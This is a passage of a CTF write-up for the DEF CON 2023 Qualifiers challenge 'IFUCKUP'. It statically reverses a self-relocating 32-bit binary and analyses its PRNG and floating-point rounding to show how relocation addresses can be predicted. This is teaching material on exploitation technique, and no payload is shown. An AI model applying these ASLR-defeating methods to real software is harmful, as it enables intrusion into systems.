DEF CON CTF 2023 Qualifiers - IFUCKUP

Share on:

Overview

Summary

This is a detailed writeup for the “IFUCKUP” challenge at the DEF CON CTF 2023 Qualifiers that I solved together with several team members from Norsecode (a collaboration of several CTF teams, including Kalmarunionen). The challenge binary that had to be exploited permits a buffer overflow on the stack, but also uses a “new and improved ASLR” and relocates stack and binary to random addresses constantly. As we learned afterwards, this challenge was based on an older “F.U.C.K.U.P.” challenge in which the intended solution was to break the pseudorandom number generator (PRNG) that determines the relocation addresses. For this challenge the PRNG was not supposed to be breakable anymore, with the intended solution being to use vdso instead. However, several teams, including us, broke the new PRNG anyway.

Writeup by: shalaamum

Solved by (alphabetical): killerdog, mikbrosim, myldero, Pie, Raptor Jesus, rot256, shalaamum, zanderdk, zopazz, zzz

This writeup was first published here.

Introduction

This was the challenge at the DEF CON CTF Qualifiers for 2023 that I spent most time on, first reversing the binary, and then working out how to break the PRNG, both with killerdog and rot256. Implementing this we had two parallel efforts, with killerdog and rot256 trying with z3, which ran into problems due to what we later found out was a bug in a specific version of z3, and me implementing a linear-algebra solution with Sage. The original version of my script would have been too slow for the timeout of only one minute (at least on a single core), so primarily Pie and Raptor Jesus worked on improving my script, speeding it up very significantly. The end result of this half of the solution was a script that could recover the internal state of the two PRNGs in the running binary. The second half of the solution, using this to obtain a shell, which includes predicting what the binary’s address will be at execution of the payload (using the crypto-half) was then done primarily by rot256, zanderdk, and zzz.

At the time of the DEF CON Quals I was still quite new at using GDB, and that the binary relocates itself constantly made debugging particularly difficult. One thing I was stuck on a while during the contest was that the binary changed the rounding mode in the control word of the x87 FPU, leading to discrepancies to the values I was expecting from the Ghidra decompile1. I did not contribute to crafting the payload used to get a shell, or to solving the problem of predicting future addresses using the recovered internal state of the PRNG, which was done by running a new instance of a patched binary locally in GDB, stopping at the point at which the internal state of the PRNG is known, and then replacing the internal state of the PRNG of the local binary with the recovered one of the binary running on the remote, and then running the local instance up to the point we want to know the base address, and then extracting that information.

The motivation for this writeup was mostly that I wanted to learn how to properly debug the binary and how to do the parts of the solution I wasn’t involved in during the contest. Because of this I rewrote all of the solution code from scratch, and thus this writeup does not reflect the solution Norsecode used during the contest. Some parts of this writeup are also more detailed than would be reasonable during a live contest, where it would be unsound strategically to spend excessive time understanding something that does not contribute to solving the challenge faster.

The bulk of this writeup is contained in the “Static reversing” section below, where we go through the entire program in detail, statically, and explain what everything does. This section also already contains steps towards a solution, by e.g. not only discussing how raw PRNG values get converted to values that are output, but also how to obtain some of the raw bits from the output values. The section after that, “Dynamic debugging” then discusses how to deal with the constant relocations when trying to dynamically understand the behavior of the binary. A solution using a GDB script (using the Python API) with a stop handler that automatically fixes breakpoints when relocating is discussed, which allows debugging across relocations. This is then used to verify some of the understanding gained from the static reversing part. Finally, the “Solution” section discusses the implementation of the actual solution, from recovery of the PRNG state to the simple ROP chain used to obtain a shell.

Static reversing

We are given a statically linked, 32-bit, stripped ELF binary.

Running the binary

If we run the binary we get an initial message and are then dropped into a infinite loop in which we can choose one of 6 options from a menu. The welcome message and the first option gives us some information on what the challenge is about:

Welcome to Improved Fully Unguessable Convoluted Kinetogenic Userspace Pseudoransomization, the new and improved ASLR.
This app is to help prove the benefits of I.F.U.C.K.U.P.
Main Menu
---------
1. Display info
2. Change random
3. View state info
4. Test stack smash
5. Get random values
-------
0. Quit
1
1Improved Fully Unguessable Convoluted Kinetogenic Userspace Pseudoransomization is a new method where the binary
is constantly moving around in memory.
It is also capable of moving the stack around randomly and will be able to move the heap around in the future.

If we choose option 2, we obtain a printout claiming App moved to new random location, while for 3, we are printed addresses of the stack and binary, as well as a random number:

Current Random: 2b489f9f
Current Stack: f4073000
Current Binary Base: de459000

When choosing 4 we can enter 100 bytes of data, which judging from the crash appear to overflow a buffer on the stack:

Input buffer is 10 bytes in size. Accepting 100 bytes of data.
This will crash however the location of the stack and binary are unknown to stop code execution
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
zsh: segmentation fault  ./ifuckup

Finally, option 5 prints out 8 lines of 8 random numbers (4 bytes each, in hex), separated into two groups of four on each line:

Random Values:
d9ac39b1 99937bb0 d355734f 9bf2073d - bb2b5dcb 4c6e3651 fd1c5c64 75684bc1
658a48fa d63bfa3f 4f18f0b4 3197f56f - 782af0bd 8b551754 f93a6738 4c6868d7
0967e41f 07ed56ac e7f0a796 f70f8072 - b23c0525 a0e67a20 e9794dc0 af9ec98b
7f1e2614 daaeeb7e 09559db6 81a4d6af - 60912d53 46f888c8 626e09e4 27c5237c
635e9e0b f3993a0e c5c02c64 87bac1c5 - 2d36d712 f2e396d5 f83373e0 f05aa080
fcbc8280 66ab7778 bd38ac98 50e2f960 - ffa444b2 9001447f 5b5f1a4a a0fb8dfe
8a174c0f 7482cea2 95f5d1b0 a76792b6 - ce3c6e25 4316f54b 5c562277 8e5ed4df
4af98464 2ca4d159 7644be03 340df8c3 - b9da326f ffba757d 95bc720d 297d57c1

entry

The decompile of the entry function is initially as follows:

void processEntry entry(void)

{
  undefined4 uVar1;
  undefined4 extraout_EDX;
  
  DAT_0804b6d4 = &Elf32_Ehdr_08048000;
  DAT_0804b6cc = 0;
  FUN_08049780();
  DAT_0804b6c4 = FUN_0804902d(0xc0,0,0x1000,3,0x22,0xffffffff,0,extraout_EDX);
  FUN_08049a06(DAT_0804b6c4);
  FUN_08049a06(DAT_0804b6c4 + 0x44);
  FUN_0804952e();
  FUN_080490db();
  do {
    uVar1 = FUN_080495a4();
    switch(uVar1) {
    case 0:
      FUN_0804902d(1,0,0,0,0,0,0,uVar1);
    default:
      FUN_08049051("Unknown command\n");
      break;
    case 1:
      FUN_08049562();
      break;
    case 2:
      FUN_080496c4();
      break;
    case 3:
      FUN_080496f0();
      break;
    case 4:
      FUN_08049674();
      break;
    case 5:
      FUN_08049813();
    }
  } while( true );
}

From running the binary previously we can guess what the functions in the switch cases must more or less do, and FUN_080495a4 must print the menu and retrieve the user’s choice.

syscall

FUN_0804902d is called in various places, in particular as FUN_0804902d(1,0,0,0,0,0,0,uVar1); in the entry function, and we know this must quit the program. The decompile of this function initially shows no arguments, but we can see from the disassembly

        0804902d 55              PUSH       EBP
        0804902e 89 e5           MOV        EBP,ESP
        08049030 56              PUSH       ESI
        08049031 53              PUSH       EBX
        08049032 57              PUSH       EDI
        08049033 55              PUSH       EBP
        08049034 8b 45 08        MOV        EAX,dword ptr [EBP + param_1]
        08049037 8b 5d 0c        MOV        EBX,dword ptr [EBP + param_2]
        0804903a 8b 4d 10        MOV        ECX,dword ptr [EBP + param_3]
        0804903d 8b 55 14        MOV        EDX,dword ptr [EBP + param_4]
        08049040 8b 75 18        MOV        ESI,dword ptr [EBP + param_5]
        08049043 8b 7d 1c        MOV        EDI,dword ptr [EBP + param_6]
        08049046 8b 6d 20        MOV        EBP,dword ptr [EBP + param_7]
        08049049 cd 80           INT        0x80
        0804904b 5d              POP        EBP
        0804904c 5f              POP        EDI
        0804904d 5b              POP        EBX
        0804904e 5e              POP        ESI
        0804904f 5d              POP        EBP
        08049050 c3              RET

that this function performs a syscall, and we should set the function signature of this function to

syscall(uint number,undefined4 arg0,undefined4 arg1,undefined4 arg2,undefined4 arg3, undefined4 arg4,undefined4 arg5)

Now the call in entry is syscall(1,0,0,0,0,0,0);, corresponding to the syscall exit(0).

print

If we input a menu option that isn’t valid, a call to FUN_08049051("Unknown command\n"); is made, so presumably this is some kind of print, and after renaming/retyping variables we see that it uses the write syscall to write the string to stdout.

void print(char *s)

{
  int len;
  
  for (len = 0; s[len] != '\0'; len = len + 1) {
  }
  syscall(4,1,s,len,0,0,0);
  return;
}

entry again

After renaming the functions, the entry function now looks like this:

void processEntry entry(void)
{
  undefined8 uVar1;
  undefined4 uVar2;
  undefined4 uVar3;
  
  binary_base = &Elf32_Ehdr_08048000;
  current_random = 0;
  uVar1 = FUN_08049780();
  uVar3 = 0;
  uVar2 = 0xffffffff;
  syscall(0xc0,0,0x1000,3,0x22,0xffffffff,0);
  DAT_0804b6c4 = (int)uVar1;
  FUN_08049a06(DAT_0804b6c4,uVar2,uVar3,(int)((ulonglong)uVar1 >> 0x20));
  FUN_08049a06(DAT_0804b6c4 + 0x44);
  FUN_0804952e();
  FUN_080490db();
  do {
    uVar2 = FUN_080495a4();
    switch(uVar2) {
    case 0:
      syscall(1,0,0,0,0,0,0);
    default:
      print("Unknown command\n");
      break;
    case 1:
      print_info_text();
      break;
    case 2:
      change_random();
      break;
    case 3:
      view_state();
      break;
    case 4:
      stack_smash();
      break;
    case 5:
      get_random();
    }
  } while( true );
}

We are now going to go through the various functions offered by the menu.

tohex

The view_state function contains lines like

print("Current Random: ");
FUN_08049000(DAT_0804b6cc,buf);
print(buf);

from which we can guess that FUN_08049000 gets an unsigned 32 bit number as first argument, and then converts it to a hex string with 8 characters in the buffer passed to as the second argument. The cleaned up decompile confirms this:

void tohex(uint number,char *buf)
{
  int index;
  byte c;
  byte nibble;
  
  index = 8;
  do {
    nibble = (byte)number & 0xf;
    c = nibble + 0x30;
    if (0x39 < c) {
      c = nibble + 0x57;
    }
    number = number >> 4;
    buf[index + -1] = c;
    index = index + -1;
  } while (index != 0);
  return;
}

view_state

The view_state function then looks like this:

void view_state(void)
{
  char buf [16];
  
  buf[6] = -3;
  buf[7] = -0x6a;
  buf[8] = '\n';
  buf[9] = '\0';
  print("Current Random: ");
  tohex(current_random,buf);
  print(buf);
  print("Current Stack: ");
  tohex(stack_address,buf);
  print(buf);
  print("Current Binary Base: ");
  tohex(binary_base,buf);
  print(buf);
  return;
}

The addresses and “random” that are printed come from globals, but it is at this point not clear yet where exactly the value comes from.

get_random

The get_random function that can be selected from the main menu and prints 8 times 8 random values looks like this in the Ghidra decompile:

void get_random(void)
{
  uint uVar1;
  longdouble lVar2;
  uint local_3c;
  char local_26 [8];
  undefined2 local_1e;
  undefined4 uStack_14;
  
  uVar1 = 1;
  uStack_14 = 0x8049823;
  print("Random Values:\n");
  do {
    lVar2 = (longdouble)FUN_08049a41(DAT_0804b6c4);
    local_3c = (uint)(longlong)ROUND(lVar2 * (longdouble)4294967295.0);
    tohex(local_3c,local_26);
    local_1e = 0x20;
    print(local_26);
    if ((uVar1 & 7) == 0) {
      print("\n");
    }
    else if ((uVar1 & 3) == 0) {
      print("- ");
      lVar2 = (longdouble)FUN_08049a41(DAT_0804b6c4 + 0x44);
      for (local_3c = (uint)(longlong)ROUND(lVar2 * (longdouble)255.0); local_3c != 0;
          local_3c = local_3c + -1) {
        FUN_08049a41(DAT_0804b6c4);
      }
    }
    uVar1 = uVar1 + 1;
  } while (uVar1 != 0x41);
  return;
}

After some cleaning up we obtain this:

void get_random(void)
{
  uint count;
  longdouble random_value_raw;
  uint random_value;
  char buf [10];
  
  count = 1;
  print("Random Values:\n");
  do {
    random_value_raw = (longdouble)step_prng(DAT_0804b6c4);
    random_value = (uint)(longlong)ROUND(random_value_raw * (longdouble)4294967295.0);
    tohex(random_value,buf);
    buf[8] = ' ';
    buf[9] = '\0';
    print(buf);
    if ((count & 7) == 0) {
      print("\n");
    }
    else if ((count & 3) == 0) {
      print("- ");
      random_value_raw = (longdouble)step_prng(DAT_0804b6c4 + 0x44);
      for (random_value = (uint)(longlong)ROUND(random_value_raw * (longdouble)255.0);
          random_value != 0; random_value = random_value + -1) {
        step_prng(DAT_0804b6c4);
      }
    }
    count = count + 1;
  } while (count != 0x41);
  return;
}

Now first we can notice that the general structure seems to be that there are two PRNGs involved here: We get values from the first PRNG, which has state stored where DAT_0804b6c4 points to, and every time we are in the middle of a line (where “- " is printed), the first PRNG is advanced a bunch of times without us getting the value printed, with the amount of times determined by a secod PRNG, whose state is stored where DAT_0804b6c4 + 0x44 points to.

The two lines

    random_value_raw = (longdouble)step_prng(DAT_0804b6c4);
    random_value = (uint)(longlong)ROUND(random_value_raw * (longdouble)4294967295.0);

are curious: what exactly is going on? We will come back to this point later.

step_prng

First, let us look at the step_prng function. From what was discussed above we can guess that the argument might be a pointer to 0x44 bytes of memory.

longdouble step_prng(uint *param_1)
{
  uint uVar1;
  uint uVar2;
  uint uVar3;
  uint uVar4;
  uint uVar5;
  uint uVar6;
  
  uVar6 = *param_1;
  uVar5 = uVar6 + 0xf & 0xf;
  uVar1 = param_1[uVar5 + 1];
  uVar3 = param_1[uVar6 + 1] << 0x10 ^ param_1[uVar6 + 1] ^ param_1[(uVar6 + 0xd & 0xf) + 1];
  uVar4 = param_1[(uVar6 + 9 & 0xf) + 1] >> 0xb ^ param_1[(uVar6 + 9 & 0xf) + 1];
  uVar2 = uVar3 ^ param_1[(uVar6 + 0xd & 0xf) + 1] << 0xf ^ uVar4;
  param_1[uVar6 + 1] = uVar2;
  uVar6 = uVar3 << 0x12 ^ uVar1 * 4 ^ uVar1 ^ uVar4 ^ uVar4 << 0x1c ^ (uVar2 & 0x6d22169) << 5;
  param_1[uVar5 + 1] = uVar6;
  *param_1 = uVar5;
  return (longdouble)2.328306e-10 * (longdouble)(ulonglong)uVar6;
}

We can see here that - up to the very end - operations are integer operations, not floating points. Furthermore, we notice that there are many uses of the array passed as an argument, but with the exception of the lines

  uVar6 = *param_1;
  uVar5 = uVar6 + 0xf & 0xf;
  *param_1 = uVar5;

the index is always 1 plus something, while in the one case here we see that the first component just gets decremented modulo 0x10. As uVar5 and uVar6 are used to calculate indices in the other uses of param_1, this leads us to guess that the first component is some kind of counter, and separate from the other 0x10 unsigned ints, that make up the rest of the state. We thus define a struct prng_state which has a field uint index, followed by a field uint[0x10] state.

We now have the following decompile:

longdouble step_prng(prng_state *prng)
{
  uint tmp4;
  uint tmp2;
  uint tmp3;
  uint new_index;
  uint result_uint;
  uint old_index;
  uint tmp1;
  
  old_index = prng->index;
  new_index = old_index + 0xf & 0xf;
  tmp1 = prng->state[new_index];
  tmp2 = prng->state[old_index] << 0x10 ^ prng->state[old_index] ^
         prng->state[old_index + 0xd & 0xf];
  tmp3 = prng->state[old_index + 9 & 0xf] >> 0xb ^ prng->state[old_index + 9 & 0xf];
  tmp4 = tmp2 ^ prng->state[old_index + 0xd & 0xf] << 0xf ^ tmp3;
  prng->state[old_index] = tmp4;
  result_uint = tmp2 << 0x12 ^ tmp1 * 4 ^ tmp1 ^ tmp3 ^ tmp3 << 0x1c ^ (tmp4 & 0x6d22169) << 5;
  prng->state[new_index] = result_uint;
  prng->index = new_index;
  return (longdouble)2.328306e-10 * (longdouble)(ulonglong)result_uint;
}

Let us break this down a bit. The state consists of an integer between 0 and 15 that we provisionally called index, and 16*32 = 512 bits that we called state. Note that the new state after running this function is F_2-linear2 in the previous state, and the linear map being applied depends only on index. We can thus define A_0, ..., A_15 to be the 512 x 512-matrices over F_2 that define the state-change depending on index, i.e. thinking of the effects on prng of this function can be described as:

state = A_{index} * state
index = index - 1

and the result before the floating-point conversion is then:

result_uint = state[index]

Let P be the permutation matrix that cyclically shifts all the bits, so that the bit with index i is afterwards found at index (i - 32) % 512, i.e. P * (v_0, ..., v_511) = (v_32, v_33, ..., v_511, v_0, ..., v_31). Then note that we have A_i = P^-i * A_0 * P^i.

Now define state' = P^index * state. Then note that state' updates in a way that can be described more succinctly:

state'_new
= P^index_new * state_new
= P * P^index * A_index * state
= P * P^index * P^-index * A_0 * P^index * state
= P * A_0 * state'

and for the integer result we have:

result_uint = state[index] = state'[0]

The upshot is that if we want to recover the internal state of the PRNG to be able to predict future values, then index is irrelevant, this is just an implementation detail for more efficient handling of the shift part, where instead of applying a permutation matrix that requires modifying 16 doublewords of memory, only decrementing a single doubleword is required.

We will thus define A = P * A_0 and consider state' in our attempt to break this PRNG.

The final thing of note here is what is up with the line

return (longdouble)2.328306e-10 * (longdouble)(ulonglong)result_uint;

i.e. how the return value depends on result_uint. This is where the Intel® 64 and IA-32 Architectures Software Developer Manuals come in handy. In the following, we will write z for result_uint to shorten notation. The relevant disassembly is the following:

        08049a5a c7 45 ec        MOV        dword ptr [EBP + local_1c+0x4],0x0
                 00 00 00 00
[...]
        08049ad2 89 7d e8        MOV        dword ptr [EBP + local_1c],result_uint
        08049ad5 df 6d e8        FILD       qword ptr [EBP + local_1c]
        08049ad8 d9 80 c8        FLD        dword ptr [EAX + 0xffffecc8]=>DAT_0804a380       = 2F800000h
                 ec ff ff
        08049ade 83 c4 14        ADD        ESP,0x14
        08049ae1 5b              POP        new_index
        08049ae2 5e              POP        ESI
        08049ae3 5f              POP        result_uint
        08049ae4 5d              POP        EBP
        08049ae5 de c9           FMULP
        08049ae7 c3              RET

The ADD and the POPs are just recovering registers and stack, the important operations are FILD, FLD and FMULP. What happens is:

  1. The 32 bit unsigned integer is moved onto the stack, where it beforehand has been zero-extended to 64 bit. Those 64 bits can thus be interpreted as a signed integer and still represent the same value as the unsigned z.
  2. FILD pushes this 64 bit signed integer to the FPU stack. This is a precise operation.
  3. FLD pushes a single precision float with raw (byte) value f8000000 to the FPU stack.
  4. FMULP multiplies the two values at the top of the stack, pops both, and pushes the result.

Now let us figure out in detail what the result will be. We start with 0x2F800000, which is interpreted as single precision float. The fractional part of the significant is encoded with 23 bits, which happen to be all 0. A 1 as the integer part is implied (normalized form). Thus the significant is precisely 1. The top bit is the sign, which is 0, for positive. What remains is the biased exponent, which is then 95. The biasing constant for single-precision floats is 127, so the actual exponent is 95 - 127 = -32. This means this floating point number precisely encodes 2^-32.

The multiplication with z then gives 2^-32 * z. Multiplication is infinitely precise and then rounded when stored as double extended precision. There are two cases:

  • Case z == 0: Then we get a precise 0.
  • Case z != 0: Then write z = 2^m + z' with z' < 2^m and as z was 32 bit value, we will have m < 32. Then for a precise fractional part of the significant we will need m bits. But there are 63 available, so this is precise. The exponent will be -32 + m. The biased exponent is then m - 32 + 16383, which can be represented in the 15 bits available.

The conclusion is that the function step_prng returns the precise value 2^-32 * z.

get_random again: floating point details

The decompile for the printout of one random number was the following:

    random_value_raw = (longdouble)step_prng(DAT_0804b6c4);
    random_value = (uint)(longlong)ROUND(random_value_raw * (longdouble)4294967295.0);
    tohex(random_value,buf);
    buf[8] = ' ';
    buf[9] = '\0';
    print(buf);

It is important that we understand precisely how the floating point number 2^-32 * z that gets returned by the call to step_prng gets converted to an unsigend int that is passed to tohex. The relevant assembly is the following:

        08049853 e8 e9 01        CALL       step_prng                                        undefined step_prng(prng_state *
                 00 00
        08049858 58              POP        EAX
        08049859 dc 8b c0        FMUL       qword ptr [EBX + 0xffffecc0]=>DAT_0804a378       = 41EFFFFFFFE00000h
                 ec ff ff
        0804985f d9 7d d6        FNSTCW     word ptr [EBP + local_2e]
        08049862 5a              POP        EDX
        08049863 8d 55 de        LEA        EDX=>buf,[EBP + -0x22]
        08049866 52              PUSH       EDX
        08049867 66 8b 45 d6     MOV        AX,word ptr [EBP + local_2e]
        0804986b 89 55 c4        MOV        dword ptr [EBP + local_40],EDX
        0804986e 80 cc 0c        OR         AH,0xc
        08049871 66 89 45 d4     MOV        word ptr [EBP + local_30],AX
        08049875 d9 6d d4        FLDCW      word ptr [EBP + local_30]
        08049878 df 7d c8        FISTP      qword ptr [EBP + random_value]
        0804987b d9 6d d6        FLDCW      word ptr [EBP + local_2e]
        0804987e ff 75 c8        PUSH       dword ptr [EBP + random_value]
        08049881 e8 7a f7        CALL       tohex                                            void tohex(uint number, char * b
                 ff ff

So as we noted before, after the CALL step_prng, the top of the FPU stack will contain ST(0) = 2^-32 * z, precisely.

The FMUL operation in this function then multiplies this value in-place with the double stored as 0x41EFFFFFFFE00000. We first need to decode what 0x41EFFFFFFFE00000 represents precisely. The top bit is zero, so this is positive. The biased exponent is 11 bits and has value 1054. The biasing constant is 1023, so the exponent is 31. The fractional part of the significant is 52 bits. Those bits have value 4503599625273344 so the significant is 1 + 4503599625273344 * 2^(-52). Thus the value represented is

2^31 + 4503599625273344 * 2^(-21)
=  2^31 + 2147483647 * 2^21 * 2^(-21)
= 2^31 + 2147483647
= 4294967295

This value is then multiplied with 2^-32 * z (which was precise for all z that we consider). We get 2^(-32) * z * 4294967295. As both z and 4294967295 are 32-bit integers, their product fits in 64 bits. This means 63 bits suffice for representing the fractional part of the significant precisely. The exponent has absolute value at most 32, so also fits in the available 15 bits after biasing. Hence this value is precise.

The next operation is FNSTCW, which stores the control word of the x87 FPU in local_2e. Then local_30 is set to 0xc0 | local_2e. The effect of this is to set bits 10 and 11, which in the control word correspond to RC, rounding control. See Vol. 1 8.1.5. of the Intel® 64 and IA-32 Architectures Software Developer Manuals. FLDCW then updates the control word of the FPU with this value1. RC being 0b11 mean that the rounding mode is set to rounding towards zero (see Vol. 1 4.8.4). FISTP then pops ST(0) and stores it after conversion to a signed 64 bit integer in random_int, which now happens by rounding towards zero. Finally, FLDCW resets the control word to what it was before.

Before FISTP, the value of ST(0) was precisely 2^(-32) * z * 4294967295. We have to convert this to a 64 bit signed integer by rounding to zero. We can rewrite the value as:

2^(-32) * z * 4294967295
= 2^(-32) * z * (2^32 - 1)
= z - 2^(-32)*z

We distinguish two cases:

  • Case z > 0: We have 0 < z < 2^32 and thus obtain 0 < 2^(-32) * z < 1. As z >= 1 it then follow that 0 <= z - 1 < z - 2^(-32) * z < z. Hence the rounded-to-zero integer we obtain is z - 1.
  • Case z == 0: Then the value is already 0, and rounded to zero this yields 0 again.

Note that the lower 32 bits of the signed integer z-1 (or 0), where z was an unsigned 32 bit integer, contain the value of z-1 (or 0) when interpreted as an unsigned 32 bit integer.

So we now fully understand how the z from step_prng gets converted into the unsigned integer that we actually get printed. Later we will want to go backwards. For that process we can then distinguish two cases:

  • Case value is v = 0: Then we can’t be sure whether z was 0 or 1.
  • Case value is v > 0: Then we can conclude that z = v + 1.

The function get_random also calls step_prng another time: In the loop in which the first PRNG is advanced a number of times, with how often depending on the second PRNG. The assembly here is very parallel, with the change that 2^-32 * z is multiplied with the single-precision float defined by0x437F0000 instead of the double defined by 0x41EFFFFFFFE00000.

For single-precision floats the fractional part of the significant has 23 bits. The value of the significant is thus 0b1.1111111 = 2 - 2^-7. The top bit, the sign, is zero, so the number is positive. Finally, the biased exponent is 0b10000110 = 134, so with biasing constant 127, the actual exponent is 7. The value is thus (2 - 2^-7) * 2^7 = 2^8 - 1.

With the same argument as before we can conclude that the result of the multiplication will then be 2^(-32) * z * (2^8 - 1) exactly. It remains to consider the conversion to a signed 64-bit integer while rounding towards zero.

For this, let us write z as z = 2^24 * z' + z'' with 0 <= z' < 2^8 and 0 <= z'' < 2^24. Then we must round towards zero the value

v = 2^-32 * (2^8 - 1) * (2^24 * z' + z'')
  = z' - 2^-8*z' + (2^8 - 1)*2^-32*z''

What range can - 2^-8*z' + (2^8 - 1)*2^-32*z'' be in? The value can not become smaller than -2^8 * (2^8 - 1), which is bigger than -1. At the same time, the value can not be bigger than (2^8 - 1) * (2^-32) * (2^24 - 1), which is smaller than 1. Thus z' - 1 < v < z' + 1, so that we can conclude that v rounded towards zero yields either z' - 1 or z'.

So if we want to go backwards and recover bits of z from w, the rounded-towards-zero value, then we know that z' (which are the top 8 bits of the 32-bit unsigned integer z) must be either w + 1 or w. For many w, some of the top bits of w + 1 and w will agree, in which case we thus recover bits of z.

One useful thing to ask here is how often this happens. If we make the simplifying assumption that w is a uniformly random 8-bit unsigned integer, then how many bits of z can we be sure about on average? The most significant bit, i.e. bit 7, is the same for w and w+1 if and only if at least one of the lower bits is 0. This chance of this is 1 - 2^-7, as the chance of all 7 least significant bits being 1 is 2^-7. More generally, bit i is the same with probability 1 - 2^-i. This means the number of bits we can expect to obtain is

sum_{0 <= i <= 7} (1 - 2^-i)
= 8 - sum_{0 <= i <= 7} 2^-i
= 8 - (1 - 2^-8)/(2^-1)
= 8 - (2 - 2^-7)
= 6 + 2^-7

So we can expect on average to obtain about 6 bits of information about z from w.

change_random

From what the running binary claims, this function should relocate binary and stack, and then printout having done so. After changing the function signature and name of the called function, the decompile is as follows:

void change_random(void)
{
  relocate();
  print("App moved to new random location\n");
  return;
}

relocate

The decompile initially looks like this:

void relocate(void)
{
  uint uVar1;
  longdouble lVar2;
  uint local_5c;
  int local_4c;
  int local_28;
  
  lVar2 = (longdouble)step_prng(prngs + 1);
  local_4c = (int)(longlong)ROUND((double)(lVar2 * (longdouble)255.0));
  for (local_28 = local_4c; local_28 != 0; local_28 = local_28 + -1) {
    step_prng(prngs);
  }
  do {
    lVar2 = (longdouble)step_prng(prngs);
    local_5c = (uint)(longlong)ROUND((double)((longdouble)4294967295.0 * lVar2));
    local_5c = local_5c & 0xfffff000;
    uVar1 = local_5c;
    syscall(0xc0,local_5c,0x4000,3,0x22,0xffffffff,0);
  } while (local_5c != uVar1);
  FUN_08049089(local_5c,binary_base,0x4000);
  syscall(0x7d,local_5c,0x3000,5,0,0,0);
  FUN_0804920c();
  return;
}

The parts surrounding step_prng calls are similar to what we saw in get_random. The second PRNG is used to step the first PRNG between 0 and 255 times, and then the first PRNG is used to get a random value for the first syscall. Cleaning up the code and looking up the syscalls we obtain the following:

void relocate(void)
{
  uint address_mapped;
  longdouble random_from_second_prng_raw;
  longdouble random_from_first_prng_raw;
  uint random_address;
  int num_steps_fast_forward_first_prng;
  int i;
  
  random_from_second_prng_raw = (longdouble)step_prng(prngs + 1);
  num_steps_fast_forward_first_prng =
       (int)(longlong)ROUND((double)(random_from_second_prng_raw * (longdouble)255.0));
  for (i = num_steps_fast_forward_first_prng; i != 0; i = i + -1) {
    step_prng(prngs);
  }
  do {
    random_from_first_prng_raw = (longdouble)step_prng(prngs);
    random_address =
         (uint)(longlong)ROUND((double)((longdouble)4294967295.0 * random_from_first_prng_raw));
    random_address = random_address & 0xfffff000;
                    /* mmap2(addr, length, prot, flags, fd, pgoffset) */
    address_mapped = syscall(0xc0,random_address,0x4000,3,0x22,0xffffffff,0);
  } while (random_address != address_mapped);
  FUN_08049089(random_address,binary_base,0x4000);
                    /* mprotect(start, len, prot) */
  syscall(0x7d,random_address,0x3000,5,0,0,0);
  FUN_0804920c();
  return;
}

So the first PRNG is used to mmap at a random address. Because it could happen that the address can not be mmapped, the loop just repeats the attempt with new random addresses until it succeeds. After mmapping something, a first function is called to presumably copy the binary over, and then part of that memory is made executable and readable only. Presumably the last function does the actual relocation.

Because we need it later we should still look a little bit more closely at the floating point stuff surrounding the stepping of the second PRNG.

080490f9 e8 43 09        CALL       step_prng                                        undefined step_prng(prng_state *
         00 00
080490fe d9 83 bc        FLD        dword ptr [EBX + 0xffffecbc]=>DAT_0804a374       = 437F0000h
         ec ff ff
08049104 83 c4 10        ADD        ESP,0x10
08049107 d9 7d c6        FNSTCW     word ptr [EBP + local_3e]
0804910a dc c9           FMUL       ST1
0804910c d9 c9           FXCH
0804910e 66 8b 45 c6     MOV        AX,word ptr [EBP + local_3e]
08049112 80 cc 0c        OR         AH,0xc
08049115 66 89 45 c4     MOV        word ptr [EBP + local_40],AX
08049119 dd 5d e0        FSTP       qword ptr [EBP + local_24]
0804911c dd 45 e0        FLD        qword ptr [EBP + local_24]
0804911f d9 6d c4        FLDCW      word ptr [EBP + local_40]
08049122 df 7d b8        FISTP      qword ptr [EBP + num_steps_fast_forward_first_
08049125 d9 6d c6        FLDCW      word ptr [EBP + local_3e]
08049128 8b 45 b8        MOV        EAX,dword ptr [EBP + num_steps_fast_forward_fi
0804912b 89 45 dc        MOV        dword ptr [EBP + i],EAX
0804912e dd 5d b0        FSTP       qword ptr [EBP + local_54]

After the call, the raw random value is in ST(0). The precise value 255 is then pushed. FMUL ST1 then multiplies these two, but this time nothing is popped, and the result is written into ST(1). Then the last two values on the stack are swapped, so that now the top of the stack contains the product, and then we have 255. For some reason the top of the stack is then popped and stored in memory as a double precision floating point value with the previous rounding mode, then loaded again and popped and stored as an integer with rounding mode set to round towards zero. Finally, the value 255 is also popped and stored, to local_54.

memcpy

FUN_08049089 initially looks as follows.

void FUN_08049089(undefined4 *param_1,undefined4 *param_2,uint param_3)
{
  undefined4 *puVar1;
  undefined *puVar2;
  undefined4 *puVar3;
  
  puVar3 = param_1;
  for (puVar1 = param_2; puVar1 != (undefined4 *)((int)param_2 + (param_3 & 0xfffffffc));
      puVar1 = puVar1 + 1) {
    *puVar3 = *puVar1;
    puVar3 = puVar3 + 1;
  }
  puVar2 = (undefined *)((param_3 & 0xfffffffc) + (int)param_1);
  for (; puVar1 != (undefined4 *)((int)param_2 + param_3); puVar1 = (undefined4 *)((int)puVar1 + 1))
  {
    *puVar2 = *(undefined *)puVar1;
    puVar2 = puVar2 + 1;
  }
  return;
}

This is clearly an implementation of memcpy:

void memcpy(byte *dst,byte *src,uint len)
{
  undefined4 *src_ptr;
  byte *dst_ptr_;
  undefined4 *dst_ptr;
  
  dst_ptr = (undefined4 *)dst;
  for (src_ptr = (undefined4 *)src; src_ptr != (undefined4 *)(src + (len & 0xfffffffc));
      src_ptr = src_ptr + 1) {
    *dst_ptr = *src_ptr;
    dst_ptr = dst_ptr + 1;
  }
  dst_ptr_ = dst + (len & 0xfffffffc);
  for (; src_ptr != (undefined4 *)(src + len); src_ptr = (undefined4 *)((int)src_ptr + 1)) {
    *dst_ptr_ = *(byte *)src_ptr;
    dst_ptr_ = dst_ptr_ + 1;
  }
  return;
}

transition_to_new_base_and_relocate_stack

At the end relocate, the function FUN_0804920c is called, which we now tentatively call transition_to_new_base_and_relocate_stack. In that function, the very first instruction is CALL FUN_08049205. That function in turn has the following disassembly:

08049205 58              POP        EAX
08049206 2b 07           SUB        EAX,dword ptr [EDI]
08049208 01 f0           ADD        EAX,ESI
0804920a ff e0           JMP        EAX

